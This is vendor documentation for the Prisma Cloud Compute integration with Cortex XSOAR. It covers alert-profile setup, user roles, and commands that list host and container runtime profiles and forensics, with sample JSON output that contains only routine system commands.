Skip to main content

Palo Alto Networks - Prisma Cloud Compute

This Integration is part of the Prisma Cloud Compute by Palo Alto Networks Pack.#

Prisma™ Cloud Compute Edition delivers cloud workload protection (CWPP) for modern enterprises, providing holistic protection across hosts, containers, and serverless deployments in any cloud, throughout the application lifecycle. Prisma Cloud Compute Edition is cloud native and API-enabled, protecting all your workloads regardless of their underlying compute technology or the cloud in which they run.

This integration lets you import Palo Alto Networks - Prisma Cloud Compute alerts into Cortex XSOAR.

Configure Prisma Cloud Compute to Send Alerts to Cortex XSOAR#

To send alerts from Prisma Cloud Compute to Cortex XSOAR, you need to create an alert profile.

  1. Log in to your Prisma Cloud Compute console.
  2. Navigate to Manage > Alerts.
  3. Click Add Profile to create a new alert profile.
  4. On the left, select Demisto from the provider list.
  5. On the right, select the alert triggers. Alert triggers specify which alerts are sent to Cortex XSOAR.
  6. Click Save to save the alert profile.
  7. Make sure you configure the user role to be at least auditor, otherwise you will not be able to fetch the alerts.

Configure Prisma Cloud Compute on Cortex XSOAR#

  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for Prisma Cloud Compute.
  3. Click Add instance to create and configure a new integration.
    ParameterDescriptionExample
    NameA meaningful name for the integration instance.Prisma Cloud Compute_<alertProfileName>
    Fetches incidentsConfigures this integration instance to fetch alerts from Prisma Cloud Compute.N/A
    Prisma Cloud Compute Console URLURL address and port of your Prisma Cloud Compute console. Copy the address from the alert profile created in Prisma Cloud Compute.https://proxyserver.com
    Prisma Cloud Compute Project Name (if applicable)Copy the project name from the alert profile created in Prisma Cloud Compute and paste in this field.N/A
    Trust any certificate (not secure)Skips verification of the CA certificate (not recommended).N/A
    Use system proxy settingsRuns the integration instance using the proxy server (HTTP or HTTPS) that you defined in the server configuration.https://proxyserver.com
    UsernamePrisma Cloud Compute login credentials.N/A
    Prisma Cloud Compute CA CertificateCA Certificate used by Prisma Cloud Compute. Copy the certificate from the alert profile created in Prisma Cloud Compute.N/A
    Source ReliabilityReliability of the source providing the intelligence data.False
  4. Click Test to validate the integration.
  5. Click Done to save the integration.

Configure Prisma Cloud Compute User Roles#

  • In order to access Prisma Cloud Compute resources, a user must be assigned with a role.
  • Without sufficient user roles, commands/fetching incidents might not work.
  • See below the user roles and their descriptions.
  • See 'Requires Role' section (each command requires a different type of role).

1) Go to Manage -> Authentication.

2) Choose the user that you want to edit roles -> Actions -> Press ....

3) Press on Edit -> Choose a Role in the Role section.

User Roles Configuration

Required User Roles#

In order to use the entire integration commands a user must have the permissions of the following user roles:

  • devSecOps
  • ci
  • auditor
  • operator
  • devOps
  • vulnerabilityManager

The administrator user role can use the entire integration commands.

See user roles descriptions in Prisma Cloud Compute: Available User Roles

Commands#

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

prisma-cloud-compute-profile-host-list#


Get information about the hosts and their profile events. This command supports asterisks which allows you to get host profiles by filtering its fields according to a specific substring.

Base Command#

prisma-cloud-compute-profile-host-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
hostnameA comma-separated list of profile (hostname) IDs. For example, !prisma-cloud-compute-profile-host-list hostname="149,257".Optional
limitThe maximum number of hosts and their profile events to return. Must be between 1-50. Default is 15.Optional
offsetThe offset by which to begin listing hosts and their profile events. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ProfileHost._idStringThe profile ID (hostname).
PrismaCloudCompute.ProfileHost.accountIDStringThe cloud account ID associated with the profile.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.commandStringThe command that triggered the connection.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.modifiedDateThe timestamp of when the event occurred.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.portNumberThe listening port number.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.processPathStringThe path to the process that uses the port.
PrismaCloudCompute.ProfileHost.apps.nameStringThe app name.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.commandStringThe command that triggered the connection.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.countryStringThe country ISO code for the given IP address.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.ipStringThe IP address captured over this port.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.modifiedDateThe timestamp of when the event occurred.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.portNumberThe outgoing port number.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.processPathStringThe path to the process that uses the port.
PrismaCloudCompute.ProfileHost.apps.processes.commandStringThe executed command.
PrismaCloudCompute.ProfileHost.apps.processes.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileHost.apps.processes.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileHost.apps.processes.pathStringThe process binary path.
PrismaCloudCompute.ProfileHost.apps.processes.ppathStringThe parent process path.
PrismaCloudCompute.ProfileHost.apps.processes.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileHost.apps.processes.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileHost.apps.startupProcess.commandStringThe executed command.
PrismaCloudCompute.ProfileHost.apps.startupProcess.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileHost.apps.startupProcess.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileHost.apps.startupProcess.pathStringThe process binary path.
PrismaCloudCompute.ProfileHost.apps.startupProcess.ppathStringThe parent process path.
PrismaCloudCompute.ProfileHost.apps.startupProcess.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileHost.apps.startupProcess.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileHost.collectionsStringA list of collections to which this profile applies.
PrismaCloudCompute.ProfileHost.createdDateThe profile creation time.
PrismaCloudCompute.ProfileHost.hashNumberThe uint32 hash associated with the profile.
PrismaCloudCompute.ProfileHost.labelsStringThe labels associated with the profile.
PrismaCloudCompute.ProfileHost.sshEvents.commandStringThe executed command.
PrismaCloudCompute.ProfileHost.sshEvents.countryStringThe SSH client's country of origin.
PrismaCloudCompute.ProfileHost.sshEvents.ipStringThe connection client IP address.
PrismaCloudCompute.ProfileHost.sshEvents.loginTimeDateThe SSH login time.
PrismaCloudCompute.ProfileHost.sshEvents.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileHost.sshEvents.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileHost.sshEvents.pathStringThe process binary path.
PrismaCloudCompute.ProfileHost.sshEvents.ppathStringThe parent process path.
PrismaCloudCompute.ProfileHost.sshEvents.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileHost.sshEvents.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileHost.timeDateThe last time this profile was modified.
PrismaCloudCompute.ProfileHost.geoip.countries.codeStringThe country code of the computer that accessed the host.
PrismaCloudCompute.ProfileHost.geoip.countries.ipStringThe IP address of the computer that accessed the host.
PrismaCloudCompute.ProfileHost.geoip.countries.modifiedDateThe last time the IP address associated with this country accessed the host console.
PrismaCloudCompute.ProfileHost.geoip.modifiedDateThe last time any of the country IP addresses accessed the host console.

Command Example#

!prisma-cloud-compute-profile-host-list hostname=*163*

Context Example#

{
"PrismaCloudCompute": {
"ProfileHost": {
"hash": 1,
"created": "2020-11-10T09:37:30.314Z",
"geoip": {
"modified": "2021-12-10T11:06:03.206Z",
"countries": [
{
"ip": "1.1.1.1",
"code": "US",
"modified": "2021-12-10T11:06:03.206Z"
},
{
"ip": "2.2.2.2",
"code": "IE",
"modified": "2021-12-10T05:22:01.858Z"
}
]
},
"labels": [
"osDistro:amzn",
"osVersion:2"
],
"apps": [
{
"processes": [
{
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/auditd",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/auditd",
"md5": ""
}
],
"startupProcess": {
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/auditd",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/auditd",
"md5": ""
},
"name": "auditd"
},
{
"processes": [
{
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/atd -f",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/atd",
"md5": ""
}
],
"startupProcess": {
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/atd -f",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/atd",
"md5": ""
},
"name": "atd"
}
],
"collections": [
"All",
"123"
],
"time": "2021-12-10T11:06:03.206Z",
"sshEvents": [
{
"ppath": "/usr/bin/bash",
"country": "IL",
"time": "December 10, 2021 11:06:03 AM",
"command": "grep twistlock_data - High rate of events, throttling started",
"user": "user123",
"ip": "1.2.3.4",
"path": "/usr/bin/grep",
"loginTime": "September 02, 2021 09:27:41 AM",
"md5": ""
},
{
"ppath": "/usr/bin/bash",
"country": "IL",
"time": "December 10, 2021 11:06:03 AM",
"command": "docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}",
"user": "user123",
"ip": "1.1.1.1",
"path": "/usr/bin/docker",
"loginTime": "September 02, 2021 09:27:41 AM",
"md5": ""
}
],
"_id": "host163",
"accountID": "1234"
}
}
}

Human Readable Output - One Host#

Host Description#

HostnameDistributionCollections
host163amzn 2All,
123

Apps#

AppNameStartupProcessUserLaunchTime
auditd/usr/sbin/auditdrootNovember 10, 2020 09:37:30 AM
atd/usr/sbin/atdrootNovember 10, 2020 09:37:30 AM

SSH Events#

UserIpProcessPathCommandTime
user1231.2.3.4/usr/bin/grepgrep twistlock_data - High rate of events, throttling startedDecember 10, 2021 11:06:03 AM
user1231.1.1.1/usr/bin/dockerdocker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}December 10, 2021 11:06:03 AM

Human Readable Output - Multiple Hosts#

Host Description#

HostnameDistributionCollections
host163amzn 2All,
123
host249Ubuntu 16.04All,
123

prisma-cloud-compute-profile-container-list#


Get information about the containers and their profile events. This command supports asterisks which allows you to get container profiles by filtering its fields according to a specific substring.

Base Command#

prisma-cloud-compute-profile-container-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
clusterA comma-separated list of runtime profile Kubernetes clusters.Optional
idA comma-separated list of runtime profile (hostname) IDs. For example, !prisma-cloud-compute-profile-container-list id="256,148".Optional
imageA comma-separated list of runtime profile images. For example, !prisma-cloud-compute-profile-container-list image="console,defender".Optional
image_idA comma-separated list of runtime profile image IDs. For example, !prisma-cloud-compute-profile-container-list image_id="123,456".Optional
namespaceA comma-separated list of runtime profile Kubernetes namespaces. For example, !prisma-cloud-compute-profile-container-list namespace="namespace1,namespace2".Optional
osA comma-separated list of service runtime profile operating systems. For example, !prisma-cloud-compute-profile-container-list os="Red Hat,Windows".Optional
stateA comma-separated list of runtime profile states. For example, !prisma-cloud-compute-profile-container-list state=active.Optional
limitThe maximum number of containers and their profile events. Must be between 1-50. Default is 15.Optional
offsetThe offset by which to begin listing containers and their profile events. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ProfileContainer._idStringThe profile ID.
PrismaCloudCompute.ProfileContainer.accountsIDsStringThe cloud account IDs associated with the container runtime profile.
PrismaCloudCompute.ProfileContainer.archivedBooleanWhether this profile is archived.
PrismaCloudCompute.ProfileContainer.capabilities.ciBooleanWhether the container is allowed to write binaries to disk and run them based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.cloudMetadataBooleanWhether the given container can query cloud metadata API based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dnsCacheBooleanWhether the DNS services used by all the pods in the cluster were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dynamicDNSQueryBooleanWhether capped behavioral DNS queries were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dynamicFileCreationBooleanWhether capped behavioral file system paths were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dynamicProcessCreationBooleanWhether capped behavioral processes were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.k8sBooleanWhether the given container can perform Kubernetes networking tasks (e.g., contact to API server).
PrismaCloudCompute.ProfileContainer.capabilities.proxyBooleanWhether the container can listen on any port and perform multiple outbound connections.
PrismaCloudCompute.ProfileContainer.capabilities.sshdBooleanWhether the container can run sshd processes.
PrismaCloudCompute.ProfileContainer.capabilities.unpackerBooleanWhether the container is allowed to write shared libraries to disk.
PrismaCloudCompute.ProfileContainer.clusterStringThe provided cluster name.
PrismaCloudCompute.ProfileContainer.collectionsStringCollections to which this profile applies.
PrismaCloudCompute.ProfileContainer.createdDateThe profile creation time.
PrismaCloudCompute.ProfileContainer.entrypointStringThe image entrypoint.
PrismaCloudCompute.ProfileContainer.events._idStringThe history event entity.
PrismaCloudCompute.ProfileContainer.events.commandStringThe process that was executed.
PrismaCloudCompute.ProfileContainer.events.hostnameStringThe hostname on which the command was invoked.
PrismaCloudCompute.ProfileContainer.events.timeDateThe time of the event.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.mountBooleanWhether the given folder is mounted.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.pathStringThe file path.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.processStringThe process that accessed the file.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.timeDateThe time in which the file was added.
PrismaCloudCompute.ProfileContainer.filesystem.static.mountBooleanWhether the given folder is a mounted.
PrismaCloudCompute.ProfileContainer.filesystem.static.pathStringThe file path.
PrismaCloudCompute.ProfileContainer.filesystem.static.processStringThe process that accessed the file.
PrismaCloudCompute.ProfileContainer.filesystem.static.timeDateThe time in which the file was added.
PrismaCloudCompute.ProfileContainer.hashNumberThe uint32 hash associated with the profile.
PrismaCloudCompute.ProfileContainer.hostNetworkBooleanWhether the instance shares the network namespace with the host.
PrismaCloudCompute.ProfileContainer.hostPidBooleanWhether the instance shares the PID namespace with the host.
PrismaCloudCompute.ProfileContainer.imageStringThe image the container runs with.
PrismaCloudCompute.ProfileContainer.imageIDStringThe profile's image ID.
PrismaCloudCompute.ProfileContainer.infraBooleanWhether this is an infrastructure container.
PrismaCloudCompute.ProfileContainer.istioBooleanWhether it is an Istio-monitored profile.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.keyStringThe key of the label.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.valueStringThe value of the label.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.nameStringThe role name.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.roleBindingStringThe name of the role binding used for display.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.rulesStringThe list of rules associated with the cluster role.
PrismaCloudCompute.ProfileContainer.k8s.roles.labels.keyStringThe key of the label.
PrismaCloudCompute.ProfileContainer.k8s.roles.labels.valueStringThe value of the label.
PrismaCloudCompute.ProfileContainer.k8s.roles.nameStringThe Kubernetes role name.
PrismaCloudCompute.ProfileContainer.k8s.roles.namespaceStringThe namespace associated with the role.
PrismaCloudCompute.ProfileContainer.k8s.roles.roleBindingStringThe name of the role binding used for display.
PrismaCloudCompute.ProfileContainer.k8s.roles.rulesStringThe policy rules associated with the role.
PrismaCloudCompute.ProfileContainer.k8s.serviceAccountStringThe service account used to access the Kubernetes API server. This field will be empty if the container is not running inside of a pod.
PrismaCloudCompute.ProfileContainer.labelStringThe profile's label.
PrismaCloudCompute.ProfileContainer.lastUpdateDateThe last time this profile was modified.
PrismaCloudCompute.ProfileContainer.learnedStartupBooleanWhether the startup events were learned.
PrismaCloudCompute.ProfileContainer.namespaceStringThe Kubernetes deployment namespace.
PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainNameStringThe queried domain name.
PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainTypeStringThe queried domain type.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.appStringThe name of the app.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.allBooleanWhether this port data represents any arbitrary ports.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.portNumberThe port number.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.timeDateThe learning timestamp of this port.
PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.allBooleanWhether this port data represents any arbitrary ports.
PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.ports.portNumberThe port number.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.ports.timeDateThe learning timestamp of this port.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.appStringThe name of the app.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.allBooleanWhether this port data represents any arbitrary ports.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.portNumberThe port number.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.timeDateThe learning timestamp of this port.
PrismaCloudCompute.ProfileContainer.osStringThe profile image operating system.
PrismaCloudCompute.ProfileContainer.processes.behavioral.commandStringThe executed command.
PrismaCloudCompute.ProfileContainer.processes.behavioral.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileContainer.processes.behavioral.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileContainer.processes.behavioral.pathStringThe process binary path.
PrismaCloudCompute.ProfileContainer.processes.behavioral.ppathStringThe parent process path.
PrismaCloudCompute.ProfileContainer.processes.behavioral.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileContainer.processes.behavioral.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileContainer.processes.static.commandStringThe executed command.
PrismaCloudCompute.ProfileContainer.processes.static.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileContainer.processes.static.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileContainer.processes.static.pathStringThe process binary path.
PrismaCloudCompute.ProfileContainer.processes.static.ppathStringThe parent process path.
PrismaCloudCompute.ProfileContainer.processes.static.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileContainer.processes.static.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileContainer.relearningCauseStringThe reason a profile entered the learning mode after being activated.
PrismaCloudCompute.ProfileContainer.remainingLearningDurationSecNumberThe total time left that the system needs to finish learning this image.
PrismaCloudCompute.ProfileContainer.stateStringThe current state of the profile.

Command Example#

!prisma-cloud-compute-profile-container-list image=*defender* limit=1

Context Example#

{
"PrismaCloudCompute": {
"ProfileContainer": {
"image": "twistlock/private:defender_21_04_439",
"hostNetwork": true,
"learnedStartup": true,
"k8s": {},
"archived": false,
"network": {
"geoip": {
"modified": "2021-12-10T13:31:42.924Z",
"countries": [
{
"ip": "1.1.1.1",
"code": "IE",
"modified": "2021-12-10T13:31:42.922Z"
},
{
"ip": "2.2.2.2",
"code": "US",
"modified": "2021-12-09T13:30:42.148Z"
}
]
},
"static": {
"listeningPorts": []
},
"behavioral": {
"outboundPorts": {
"ports": [
{
"port": 80,
"time": "2021-09-02T11:05:16.836Z"
}
]
}
}
},
"capabilities": {
"ci": true
},
"label": "twistlock",
"state": "active",
"collections": [
"All",
"123",
"Prisma Cloud resources"
],
"entrypoint": "/usr/local/bin/defender",
"events": null,
"lastUpdate": "2021-09-02T11:05:10.935Z",
"hash": 3,
"infra": false,
"accountIDs": [
"123"
],
"processes": {
"static": [
{
"ppath": "",
"path": "/usr/bin/mongodump",
"time": "0001-01-01T00:00:00Z",
"md5": ""
},
{
"ppath": "",
"path": "/usr/bin/mongorestore",
"time": "0001-01-01T00:00:00Z",
"md5": ""
}
],
"behavioral": [
{
"ppath": "/usr/local/bin/defender",
"path": "/usr/local/bin/fsmon",
"time": "2021-09-02T11:05:08.931Z",
"md5": ""
},
{
"ppath": "/usr/bin/apt-get",
"path": "/usr/lib/apt/methods/gpgv",
"time": "2021-11-24T15:12:28.502Z",
"command": "gpgv",
"md5": ""
}
]
},
"created": "2020-09-02T11:05:08.931Z",
"imageID": "sha256:8d82e2c21c33e1ffb37ea901d18df15c08123258609e6d7c4aecc7fb4a5a8738",
"filesystem": {
"static": [
{
"process": "*",
"path": "/var/log/audit",
"mount": true,
"time": "2021-09-02T11:05:08.931Z"
},
{
"process": "*",
"path": "/var/lib/twistlock",
"mount": true,
"time": "2021-09-02T11:05:08.931Z"
}
],
"behavioral": [
{
"process": "/usr/local/bin/defender",
"path": "/prisma-static-data",
"mount": true,
"time": "2021-09-02T11:05:10.935Z"
},
{
"process": "/usr/local/bin/defender",
"path": "/tmp",
"mount": false,
"time": "2021-09-02T11:05:16.784Z"
}
]
},
"_id": "container123",
"os": "Red Hat Enterprise Linux 8.4 (Ootpa)",
"remainingLearningDurationSec": -1,
"hostPid": true
}
}
}

Human Readable Output - One Container#

Container Description#

ContainerIDImageOsStateCreatedEntryPoint
container123twistlock/private:defender_21_04_439Red Hat Enterprise Linux 8.4 (Ootpa)activeSeptember 02, 2020 11:05:08 AM/usr/local/bin/defender

Processes#

TypePathDetectionTime
static/usr/bin/mongodumpJanuary 01, 2021 00:00:00 AM
static/usr/bin/mongorestoreJanuary 01, 2021 00:00:00 AM
behavioral/usr/local/bin/fsmonSeptember 02, 2021 11:05:08 AM
behavioral/usr/lib/apt/methods/gpgvNovember 24, 2021 15:12:28 PM

Human Readable Output - Multiple Containers#

Container Description#

ContainerIDImageOsStateCreatedEntryPoint
container123twistlock/private:defender_21_04_439Red Hat Enterprise Linux 8.4 (Ootpa)activeSeptember 02, 2021 11:05:08 AM/usr/local/bin/defender
container1234twistlock/private:console_21_04_439Red Hat Enterprise Linux 8.4 (Ootpa)activeSeptember 02, 2021 11:05:08 AM/app/server

prisma-cloud-compute-profile-container-hosts-list#


Get the hosts where a specific container is running.

Base Command#

prisma-cloud-compute-profile-container-hosts-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
idContainer profile ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command.Required
limitThe maximum number of hosts to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing hosts of the container. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ProfileContainerHost.containerIDStringThe container ID.
PrismaCloudCompute.ProfileContainerHost.hostsIDsStringThe list of hosts where this container is running.

Command Example#

!prisma-cloud-compute-profile-container-hosts-list id=container123

Context Example#

{
"PrismaCloudCompute": {
"ProfileContainerHost": {
"containerID": "container123",
"hostsIDs": [
"host1",
"host2"
]
}
}
}

Human Readable Output#

Hosts#

HostsIDs
host1,
host2

prisma-cloud-compute-profile-container-forensic-list#


Get runtime forensics data for a specific container on a specific host.

Base Command#

prisma-cloud-compute-profile-container-forensic-list

Input#

Argument NameDescriptionRequired
idThe container ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command.Required
collectionsThe collections scoping the query.Optional
hostnameThe hostname for which data should be fetched.Required
incident_idThe incident ID in case the request type is an incident.Optional
limitThe maximum number of forensics data records to return. Must be between 1-50. Default is 20.Optional
offsetThe offset by which to begin listing records from. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ContainerForensic.containerIDStringThe container ID.
PrismaCloudCompute.ContainerForensic.hostnameStringThe hostname.
PrismaCloudCompute.ContainerForensic.Forensics.allPortsBooleanWhether all listening ports are allowed.
PrismaCloudCompute.ContainerForensic.Forensics.attackStringThe event attack type.
PrismaCloudCompute.ContainerForensic.Forensics.categoryStringThe incident category.
PrismaCloudCompute.ContainerForensic.Forensics.commandStringThe event command.
PrismaCloudCompute.ContainerForensic.Forensics.containerIdStringThe event container ID.
PrismaCloudCompute.ContainerForensic.Forensics.dstIPStringThe destination IP address of the connection.
PrismaCloudCompute.ContainerForensic.Forensics.dstPortStringThe destination port.
PrismaCloudCompute.ContainerForensic.Forensics.dstProfileIDStringThe profile ID of the connection destination.
PrismaCloudCompute.ContainerForensic.Forensics.effectStringThe runtime audit effect.
PrismaCloudCompute.ContainerForensic.Forensics.listeningStartTimeDateThe port listening start time.
PrismaCloudCompute.ContainerForensic.Forensics.messageStringThe runtime audit message.
PrismaCloudCompute.ContainerForensic.Forensics.networkCollectionTypeStringThe type of the network collection method.
PrismaCloudCompute.ContainerForensic.Forensics.outboundBooleanWhether the port is outbound.
PrismaCloudCompute.ContainerForensic.Forensics.pathStringThe event path.
PrismaCloudCompute.ContainerForensic.Forensics.pidNumberThe event process ID.
PrismaCloudCompute.ContainerForensic.Forensics.portNumberThe listening port.
PrismaCloudCompute.ContainerForensic.Forensics.ppidNumberThe event parent process ID.
PrismaCloudCompute.ContainerForensic.Forensics.processStringThe event process description.
PrismaCloudCompute.ContainerForensic.Forensics.srcIPStringThe source IP of the connection
PrismaCloudCompute.ContainerForensic.Forensics.srcProfileIDStringThe profile ID of the connection source.
PrismaCloudCompute.ContainerForensic.Forensics.staticBooleanWhether the event was added to the profile without behavioral indications.
PrismaCloudCompute.ContainerForensic.Forensics.typeStringThe event type.
PrismaCloudCompute.ContainerForensic.Forensics.timestampDateThe event timestamp.
PrismaCloudCompute.ContainerForensic.Forensics.userStringThe event user.

Command Example#

!prisma-cloud-compute-profile-container-forensic-list id=container123 hostname=host123 limit=2

Context Example#

{
"PrismaCloudCompute": {
"ContainerForensic": {
"Forensics": [
{
"containerId": "a6f769dd",
"timestamp": "December 10, 2021 11:49:50 AM",
"pid": 1341,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "mongodump --out=/var/lib/twistlock-backup/dump",
"user": "twistlock",
"path": "/usr/bin/mongodump",
"ppid": 15816,
"type": "Process spawned"
},
{
"containerId": "a6f769dd",
"timestamp": "December 09, 2021 11:49:22 AM",
"pid": 20891,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "mongodump --out=/var/lib/twistlock-backup/dump",
"user": "twistlock",
"path": "/usr/bin/mongodump",
"ppid": 15816,
"type": "Process spawned"
}
],
"containerID": "container123",
"hostname": "host123"
}
}
}

Human Readable Output#

Containers forensic report#

TypePathUserPidContainerIdTimestampCommand
Process spawned/usr/bin/mongodumptwistlock1341a6f769ddDecember 10, 2021 11:49:50 AMmongodump --out=/var/lib/twistlock-backup/dump
Process spawned/usr/bin/mongodumptwistlock20891a6f769ddDecember 09, 2021 11:49:22 AMmongodump --out=/var/lib/twistlock-backup/dump

prisma-cloud-compute-host-forensic-list#


Get forensics on a specific host.

Base Command#

prisma-cloud-compute-host-forensic-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
idThe host ID. Can be retrieved from the prisma-cloud-compute-profile-host-list command.Required
collectionsThe collections scoping the query.Optional
incident_idThe incident ID in case the request type is an incident.Optional
limitThe maximum number of forensics data records to return. Must be between 1-50. Default is 20.Optional
offsetThe offset by which to begin listing host forensics from. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.HostForensic.Forensics.appStringThe application associated with the event.
PrismaCloudCompute.HostForensic.Forensics.attackStringThe event attack type.
PrismaCloudCompute.HostForensic.Forensics.categoryStringThe incident category.
PrismaCloudCompute.HostForensic.Forensics.commandStringThe event command.
PrismaCloudCompute.HostForensic.Forensics.countryStringThe country associated with the event.
PrismaCloudCompute.HostForensic.Forensics.effectStringThe runtime audit effect.
PrismaCloudCompute.HostForensic.Forensics.interactiveBooleanWhether the event is interactive.
PrismaCloudCompute.HostForensic.Forensics.ipStringThe IP address associated with the event.
PrismaCloudCompute.HostForensic.Forensics.listeningStartTimeDateThe listening port start time.
PrismaCloudCompute.HostForensic.Forensics.messageStringThe runtime audit message.
PrismaCloudCompute.HostForensic.Forensics.pathStringThe event path.
PrismaCloudCompute.HostForensic.Forensics.pidNumberThe event process ID.
PrismaCloudCompute.HostForensic.Forensics.portNumberThe listening port.
PrismaCloudCompute.HostForensic.Forensics.ppathStringThe event parent path.
PrismaCloudCompute.HostForensic.Forensics.ppidNumberThe event parent process ID.
PrismaCloudCompute.HostForensic.Forensics.processStringThe event process.
PrismaCloudCompute.HostForensic.Forensics.timestampDateThe event timestamp.
PrismaCloudCompute.HostForensic.Forensics.typeStringThe event type.
PrismaCloudCompute.HostForensic.Forensics.userStringThe event user.
PrismaCloudCompute.HostForensic.hostIDStringThe host ID that was analyzed.

Command Example#

!prisma-cloud-compute-host-forensic-list id=hostname123 limit=3 offset=5

Context Example#

{
"PrismaCloudCompute": {
"HostForensic": {
"Forensics": [
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17478,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "awk { printf $3 \"|\" $2 \"|\" $1 \":\"}",
"user": "cakeagent",
"path": "/usr/bin/gawk",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17477,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "grep -vE ^Filesystem|tmpfs|cdrom",
"user": "cakeagent",
"path": "/bin/grep",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17476,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "df -H -P -B G",
"user": "cakeagent",
"path": "/bin/df",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
}
],
"hostID": "hostname123"
}
}
}

Human Readable Output#

Host forensics report#

TypePathUserPidTimestampCommandApp
